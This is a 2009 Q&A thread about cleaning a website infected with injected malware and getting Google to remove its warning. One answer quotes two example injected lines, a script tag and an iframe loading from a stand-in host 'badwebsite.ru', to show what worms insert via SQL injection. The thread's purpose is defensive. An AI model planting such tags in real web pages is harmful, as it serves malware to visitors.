3

My website www.sagamountain.com was recently infected by a malware distributor (or at least I think it may have been).

I have removed all external content, google ads, firefly chat, etc.

I uploaded a backup from a few weeks ago, when there was no issue.

I patched the SQL injection hole.

Now, how long will it take to unmark it as dangerous? Where can I contact google?

I am not sure if this is the right place to post it, but since it may have been a server issue I may as well. Can sites inject base64 code via a virus on the whole server, or is it only via sql injection?

Thanks for the help, viruses freak me out.

Is there an online virus scanner that can scan my page and tell me what is wrong?

RichVel
  • 3,554
  • 1
  • 18
  • 23
Cyclone
  • 206
  • 3
  • 8

2 Answers2

4

In regards to google, review their page about malware infected sites.

My site and Google › My site's been hacked

You will want to login to their webmaster tools page, add your site to your account and preform the verification steps. Then you will get access to do things such as request your site be reviewed for nor longer being infected.

ManiacZX
  • 1,656
  • 13
  • 16
  • I already added it, but it says it is fine, yet I still have viruses. Ill check out the other link, thanks! – Cyclone Oct 26 '09 at 21:11
  • Turns out I still HAD the virus, but it was only the server that was infected instead of my files. Read my comment below. Thanks for your help!! – Cyclone Oct 26 '09 at 22:35
3

This is a relatively common problem these days. Many many worms attempt to get themselves in your server code via SQL injection, or by modifying local .html content which is then uploaded to a web server. Usually they will attempt to put:

<script src='http://badwebsite.ru/blah.js'></script>

or

<iframe src='http://badwebsite.ru/blah.html' />

into your source page via SQL injection or source code modification.

As far as I know the worms modify their attack vectors through JavaScript obfuscation engines or similar and are hard to scan against.

These attacks have been made possible by two recent, huge, remote code executions:

  • Adobe Flash JavaScript exploits which allow a Flash object to be created with about 15K of arbitrary code.
  • An exploit to the Windows Presentation Framework extension in Firefox installed by Microsoft .NET 3.5 on Windows systems.

Both of these are huge security risks.

You should use parameter binding in web application development whenever possible to avoid SQL injection attacks.

Kyle Smith
  • 9,683
  • 1
  • 31
  • 32
  • How can I find out what file is infected? I just found some JS that I know I did not put there. – Cyclone Oct 26 '09 at 19:41
  • Okay, the server itself is infected. I created a test HTML file which had an empty head and a body with only a

    title in it, but when I viewed it in the browser it had the JavaScript in it as well. Thank you for your help!

     – Cyclone Oct 26 '09 at 22:35
  • Unfortunately these recent security holes have created so many more attack vectors for worms. My father is in the SEO business and had an issue with a worm that sat on Windows XP workstations and searched for index.html files, inserting it's \ – Kyle Smith Oct 28 '09 at 14:04